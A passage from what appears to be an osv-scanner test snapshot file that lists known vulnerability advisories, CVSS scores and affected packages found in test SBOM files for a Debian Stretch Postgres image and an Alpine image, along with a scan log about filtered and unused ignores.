https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file#01 - 2] --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_multiple_files - 1] Scanning dir testdata/sbom-insecure/alpine.cdx.xml Scanning dir testdata/sbom-insecure/postgres-stretch.cdx.xml Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 2 local/unscannable package/s from the scan. CVE-2025-26519 and 1 alias have been filtered out because: (no reason given) CVE-2018-25032 and 1 alias have been filtered out because: (no reason given) CVE-2022-1304 and 2 aliases have been filtered out because: (no reason given) GO-2022-0274 and 2 aliases have been filtered out because: (no reason given) Filtered 6 vulnerabilities from output testdata/osv-scanner-partial-ignores-config.toml has unused ignores: - CVE-2019-5188 Total 22 packages affected by 169 known vulnerabilities (19 Critical, 70 High, 53 Medium, 3 Low, 24 Unknown) from 3 ecosystems. 10 vulnerabilities can be fixed. +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 